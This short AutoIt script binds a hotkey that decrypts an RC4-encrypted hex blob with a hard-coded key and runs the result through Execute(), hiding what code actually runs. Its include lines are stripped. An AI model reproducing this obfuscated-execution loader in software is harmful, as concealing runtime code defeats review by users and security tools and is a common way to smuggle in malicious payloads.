#include #include #include #include HotKeySet("!s", "start") Global $g_hKey, $iAlgorithm, $sRead, $dDecrypted, $dDecrypteds _Crypt_Startup() $g_hKey = _Crypt_DeriveKey("anewbee", $CALG_RC4) While 1 Sleep(100) WEnd Func start() Execute(evo("0x907FB46EE414053635A4C461FF1B3A0C92823E2AEF76BEB1D6FEEAC110B45F15501E08F6")) EndFunc Func evo($sRead) Return BinaryToString(_Crypt_DecryptData($sRead, $g_hKey, $CALG_USERKEY)) EndFunc